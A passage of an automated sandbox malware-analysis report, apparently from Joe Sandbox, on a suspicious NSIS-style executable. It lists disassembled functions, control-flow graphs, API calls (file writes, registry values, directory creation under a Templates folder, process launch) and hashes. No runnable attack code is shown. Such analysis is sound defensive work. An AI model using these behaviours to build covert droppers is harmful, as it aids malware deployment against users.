                                                                                                            • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                            • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                            Function 0040317D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 716 40317d-4031a6 GetTickCount 717 4032e7-4032ef call 402d1a 716->717 718 4031ac-4031d7 call 40330f SetFilePointer 716->718 723 4032f1-4032f6 717->723 724 4031dc-4031ee 718->724 725 4031f0 724->725 726 4031f2-403200 call 4032f9 724->726 725->726 729 403206-403212 726->729 730 4032d9-4032dc 726->730 731 403218-40321e 729->731 730->723 732 403220-403226 731->732 733 403249-403265 call 406390 731->733 732->733 734 403228-403248 call 402d1a 732->734 739 4032e2 733->739 740 403267-40326f 733->740 734->733 741 4032e4-4032e5 739->741 742 403271-403287 WriteFile 740->742 743 4032a3-4032a9 740->743 741->723 745 403289-40328d 742->745 746 4032de-4032e0 742->746 743->739 744 4032ab-4032ad 743->744 744->739 748 4032af-4032c2 744->748 745->746 747 40328f-40329b 745->747 746->741 747->731 749 4032a1 747->749 748->724 750 4032c8-4032d7 SetFilePointer 748->750 749->748 750->717
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00403192
                                                                                                              • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                            • WriteFile.KERNELBASE(0040BE78,0040CF84,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                            • SetFilePointer.KERNELBASE(00006690,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$CountTickWrite
                                                                                                            • String ID: x>A
                                                                                                            • API String ID: 2146148272-3854404225
                                                                                                            • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                            • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                            • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                            • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                                                            Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 751 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 758 4029c7-4029d6 751->758 759 40237d-402385 751->759 760 402387-402394 call 402b3a lstrlenW 759->760 761 402398-40239b 759->761 760->761 764 4023ab-4023ae 761->764 765 40239d-4023aa call 402b1d 761->765 769 4023b0-4023ba call 403062 764->769 770 4023bf-4023d3 RegSetValueExW 764->770 765->764 769->770 771 4023d5 770->771 772 4023d8-4024b2 RegCloseKey 770->772 771->772 772->758 776 402793-40279a 772->776 776->758
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso68A0.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nso68A0.tmp
                                                                                                            • API String ID: 1356686001-1376522407
                                                                                                            • Opcode ID: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                                            • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                            • Opcode Fuzzy Hash: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                                            • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                                                            Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 777 4015b9-4015cd call 402b3a call 4059e0 782 401614-401617 777->782 783 4015cf-4015eb call 405962 CreateDirectoryW 777->783 785 401646-402197 call 401423 782->785 786 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 782->786 790 40160a-401612 783->790 791 4015ed-4015f8 GetLastError 783->791 798 4029c7-4029d6 785->798 786->798 801 40163e-401641 786->801 790->782 790->783 794 401607 791->794 795 4015fa-401605 GetFileAttributesW 791->795 794->790 795->790 795->794 801->798
                                                                                                            APIs
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,774D2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 004059EE
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,?,00000000,000000F0), ref: 00401630
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet, xrefs: 00401623
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet
                                                                                                            • API String ID: 3751793516-406486772
                                                                                                            • Opcode ID: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                                            • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                            • Opcode Fuzzy Hash: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                                            • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                                                            Function 10001771 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 803 10001771-100017ad call 10001b3e 807 100017b3-100017b7 803->807 808 100018be-100018c0 803->808 809 100017c0-100017cd call 100022eb 807->809 810 100017b9-100017bf call 100022a1 807->810 815 100017fd-10001804 809->815 816 100017cf-100017d4 809->816 810->809 819 10001824-10001828 815->819 820 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 815->820 817 100017d6-100017d7 816->817 818 100017ef-100017f2 816->818 822 100017d9-100017da 817->822 823 100017df-100017e0 call 10002868 817->823 818->815 826 100017f4-100017f5 call 10002b23 818->826 824 10001866-1000186c call 1000248d 819->824 825 1000182a-10001864 call 100015cc call 1000248d 819->825 844 1000186d-10001871 820->844 828 100017e7-100017ed call 1000260b 822->828 829 100017dc-100017dd 822->829 835 100017e5 823->835 824->844 825->844 838 100017fa 826->838 843 100017fc 828->843 829->815 829->823 835->838 838->843 843->815 845 10001873-10001881 call 10002450 844->845 846 100018ae-100018b5 844->846 853 10001883-10001886 845->853 854 10001899-100018a0 845->854 846->808 851 100018b7-100018b8 GlobalFree 846->851 851->808 853->854 855 10001888-10001890 853->855 854->846 856 100018a2-100018ad call 10001555 854->856 855->854 857 10001892-10001893 FreeLibrary 855->857 856->846 857->854
                                                                                                            APIs
                                                                                                              • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                              • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                              • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                              • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                              • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                              • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                              • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                              • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                              • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767494692-3916222277
                                                                                                            • Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                            • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                                            • Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                            • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760
                                                                                                            Function 00403062 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 860 403062-403070 861 403072-403088 SetFilePointer 860->861 862 40308e-403097 call 40317d 860->862 861->862 865 403177-40317a 862->865 866 40309d-4030b0 call 405bd9 862->866 869 403163 866->869 870 4030b6-4030ca call 40317d 866->870 872 403165-403166 869->872 870->865 874 4030d0-4030d3 870->874 872->865 875 4030d5-4030d8 874->875 876 40313f-403145 874->876 879 403174 875->879 880 4030de 875->880 877 403147 876->877 878 40314a-403161 ReadFile 876->878 877->878 878->869 881 403168-403171 878->881 879->865 882 4030e3-4030ed 880->882 881->879 883 4030f4-403106 call 405bd9 882->883 884 4030ef 882->884 883->869 887 403108-40311d WriteFile 883->887 884->883 888 40313b-40313d 887->888 889 40311f-403122 887->889 888->872 889->888 890 403124-403137 889->890 890->882 891 403139 890->891 891->879
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                            • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$PointerWrite
                                                                                                            • String ID: x>A
                                                                                                            • API String ID: 539440098-3854404225
                                                                                                            • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                            • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                            • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                            • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                                                            Function 00405B85 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 892 405b85-405b91 893 405b92-405bc6 GetTickCount GetTempFileNameW 892->893 894 405bd5-405bd7 893->894 895 405bc8-405bca 893->895 897 405bcf-405bd2 894->897 895->893 896 405bcc 895->896 896->897
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-386316673
                                                                                                            • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                            • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                            • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                            • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                            Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                              • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                              • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3585118688-0
                                                                                                            • Opcode ID: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                                            • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                            • Opcode Fuzzy Hash: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                                            • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                            Function 00405108 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                              • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                            • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                            • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                            • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                            Function 00405665 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00405678
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
